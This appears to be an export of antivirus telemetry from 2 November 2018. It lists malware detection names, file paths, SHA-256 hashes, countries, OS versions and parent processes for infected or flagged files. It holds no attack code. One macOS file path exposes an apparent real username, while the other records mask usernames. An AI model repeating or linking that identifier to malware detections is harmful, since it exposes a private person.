  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8d58f2a6c822eadd2715f83e09e05d71089d5ead0db30dccf9937eed917c537', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8def4e45e01b29ea7b409415d5336ec2a66eee3329b4c877bcf13534e3d457a', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rapuntsel schastliva navsegda 2012 kino-bezsms.exe', filepath='C:\\Documents and Settings\\X\\Мои документы\\Загрузки\\rapuntsel schastliva navsegda 2012 kino-bezsms.exe', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='a94dd49899cbfffc72023ac58e7f415a8394ec2f2f5f10db27915631c2c5a7c5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103838-4bf1f1e3', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-103819-48058CDA\\AVSCAN-20181102-103838-4BF1F1E3', filesize=600000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='a94dd49899cbfffc72023ac58e7f415a8394ec2f2f5f10db27915631c2c5a7c5', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 2014\\TOOL\\MSV\\ENV\\MSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='a98ecc5785c55fc0d35f6d5249e11e66b5a6bd8ce5f2bdae24a7e6de1c40c6ff', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192701-ade0a9fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-192341-9A7DD6A8\\AVSCAN-20181102-192701-ADE0A9FE', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181405-71e711ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e897b15\\AVSCAN-20181102-181132-673916F3\\AVSCAN-20181102-181405-71E711CA', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='\\\\\\"first_run\\\\\\" \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\BA4DAC13-8DFA-4EC9-BB5D-2C33A037EFFD\\\\\\\\installer_campaign_14922.exe\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', parentsize=320000, timestamp='2018-11-02T14:22:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline='\\\\\\/uac', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\programm\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-02T13:09:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140913-362975bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1407a8c\\AVSCAN-20181102-140846-3337120A\\AVSCAN-20181102-140913-362975BB', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193250-8f5792d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db4a7199\\AVSCAN-20181102-193045-7F92F013\\AVSCAN-20181102-193250-8F5792D8', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='c:\\users\\X\\appdata\\roaming\\qipapp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='season 3.exe', filepath='/Volumes/Untitled 1/\xa0/IF LOVING YOU IS WRONG/Season 3/Season 3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M2.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='touchup.exe', filepath='C:\\Program Files\\The Sims 4\\__Installer\\DLC\\GP02\\__Installer\\Touchup.exe', filesize=972000, name='W32/Jeefo.A.#M1.#R1'), hash='aa5e55ecf34e18c71aa66fe596b1cdce7a729dbfad9567146a76072e98cfc405', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:t5d72lTX70e5LlxG.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:52:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utps_addrbook_task_00011.html', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\UTPS\\common\\usermanual\\bg\\plugins\\AddrBookUIPlugin\\utps_addrbook_task_00011.html', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='aaaa60c55bf4c4663c2e749470786c4ece2fb2294a597d02c948c11b8305ce41', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe', parentsize=1761256, timestamp='2018-11-02T13:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160633-22c98168', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7292aa3e\\AVSCAN-20181102-160338-11E800BF\\AVSCAN-20181102-160633-22C98168', filesize=228000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='aaaa60c55bf4c4663c2e749470786c4ece2fb2294a597d02c948c11b8305ce41', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:06:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scrcons.exe', filepath='H:\\TẤT CẢ\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\wbem\\scrcons.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='aafd271df63b2545afcfae86b16e90ca1a0e5642b5eb54fa797eeec1900631dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tab_transcriber_3.05.rar', filepath='D:\\Téléchargement\\Tab_Transcriber_3\\.tmp\\Tab_Transcriber_3.05.rar', filesize=1248000, name='TR/Injector.SF.#M1.#R1'), hash='ab320e3ff0e09d6602f89099b95204efe28187c3600558ec67f1101d7ca44280', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T06:29:42Z'), dt=datetime.date(2018, 11, 2)),
